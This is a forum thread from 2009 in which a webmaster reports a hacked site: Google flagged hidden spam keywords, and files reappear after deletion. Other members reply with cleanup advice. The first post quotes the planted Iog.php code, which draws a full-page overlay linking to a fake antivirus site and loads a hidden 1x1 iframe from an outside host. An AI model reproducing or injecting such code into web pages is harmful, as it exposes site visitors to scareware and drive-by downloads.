Today's Posts Follow Us On Twitter! TFL Members on Twitter  
Forum search: Advanced Search  
Navigation
Marketplace
  Members Login:
Lost password?
  Forum Statistics:
Forum Members: 24,255
Total Threads: 81,209
Total Posts: 566,943
There are 57 users currently browsing (tf).
 
  Our Partners:
 
  TalkFreelance     TalkFreelance Information     General Discussion :

site hacked google warnings too...pls help

Thread title: site hacked google warnings too...pls help
Reply    
    Thread tools Search this thread Display Modes  
12-13-2009, 10:50 AM
#1
tanicos is offline tanicos
Status: Member
Join date: May 2008
Location:
Expertise:
Software:
 
Posts: 164
iTrader: 5 / 100%
 

tanicos is an unknown quantity at this point

  Old  site hacked google warnings too...pls help

I wouldn't have noticed that my site was hacked if Google didn't sent me an email letting me know that he found some hidden keywords in my pages and it breaks their rules and some pages were taken of the index.
I took a look at my FTP and in that particular domain indeed there were some extra files like this:

1. a folder named .xdata which contained at least 300 html files with weird names like: 790-sports-animal.com.html; 2010-heisman-odds.html; agua-bella.html and so on. These html files contained urls and keywords
2. a file named Iog.php which contained the following code:

PHP Code:
document.write('<div style="position: absolute; top: 0; left: 0; width: 100%;  height: 4000px;  background-color: #FFFFFF; padding: 0px">');
function 
go()
{
window.open("http://antyvirusservicenow.com/hitin.php?land=20&affid=34100");
}
document.write('<center><table align=center cellpadding=0 cellspacing=0 style="border: 0px solid; border-color: #000000; width: 400px; height: 300px; padding: 30px; margin-top: 100px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #000000;"><tr><td><br><br><br><br><br><br><br><br><br><br><center><input type=submit name=klik id=klik value="-=ENTER=-"  onclick="go();" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 40px; color: red; font-weight: bold; width: 300px; height: 60px; border: 2px solid; cursor: pointer"></center></td></tr></table></center></font></div><iframe src="http://levitt-tupa-wkolota.freehostia.com/k.html" width="1" height="1"></iframe>'); 
3. a logs file which again has a lot of links and keywords

I deleted these 2 files and folder but they are created every time. I also changed the .xdata folder permissions to 444 but it still changes itself to 777.

I couldn't find those keywords hidden in my pages at all.

Anyone has any clue?

Thanks

Reply With Quote
12-13-2009, 12:01 PM
#2
santa is offline santa
santa's Avatar
Status: Member
Join date: Mar 2009
Location: Location: location.
Expertise: Design, HTML
Software: Espresso, Photoshop, Mail.app
 
Posts: 398
iTrader: 7 / 100%
 

santa is on a distinguished road

Send a message via ICQ to santa Send a message via AIM to santa Send a message via MSN to santa Send a message via Yahoo to santa Send a message via Skype™ to santa

  Old

Download the whole site to your computer, clear the site's FTP files and things like that, then delete the "hacked" files that have keywords, and upload it again.

If that doesn't work, repeat again, looking HARDER for some malicious files that shouldn't be there.

Reply With Quote
12-13-2009, 06:00 PM
#3
NeiL is offline NeiL
NeiL's Avatar
Status: Member
Join date: Oct 2005
Location: Derby, England
Expertise: Graphic/Web Design
Software: Photoshop CS3
 
Posts: 325
iTrader: 4 / 100%
 

NeiL is on a distinguished road

  Old

some ones put a virus on your site which acts like an antivirus but infects what it can. i had to clean it from my mums computer a few weeks back.

Reply With Quote
12-13-2009, 06:31 PM
#4
Village Genius is offline Village Genius
Village Genius's Avatar
Status: Geek
Join date: Apr 2006
Location: Denver, CO
Expertise: Software
Software: Chrome, Notepad++
 
Posts: 6,893
iTrader: 18 / 100%
 

Village Genius will become famous soon enough

  Old

There is a free program called Agent Ransack that can search though files in a given folder very quickly. I use it at work whenever I need to do a mass search. Download all the files from your site and do a search for the keywords and clean or delete the files.

Wipe the site (this will require some downtime) and upload the cleaned files. If this still persists, check your database and then the server itself.

Reply With Quote
12-13-2009, 07:00 PM
#5
spencerp is offline spencerp
Status: On Vacation
Join date: Apr 2007
Location: Milton, Pennsylvania, USA
Expertise:
Software:
 
Posts: 1,332
iTrader: 27 / 100%
 

spencerp is an unknown quantity at this point

Send a message via AIM to spencerp Send a message via MSN to spencerp Send a message via Yahoo to spencerp

  Old

Originally Posted by Village Genius View Post
There is a free program called Agent Ransack that can search though files in a given folder very quickly.
Thanks for that Dan! I haven't had this problem yet (knock on wood) but I'm sure that tool will come in handy in the future!

Reply With Quote
Reply    


Thread Tools
Display Modes

  Posting Rules  
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump:
 
  Contains New Posts Forum Contains New Posts   Contains No New Posts Forum Contains No New Posts   A Closed Forum Forum is Closed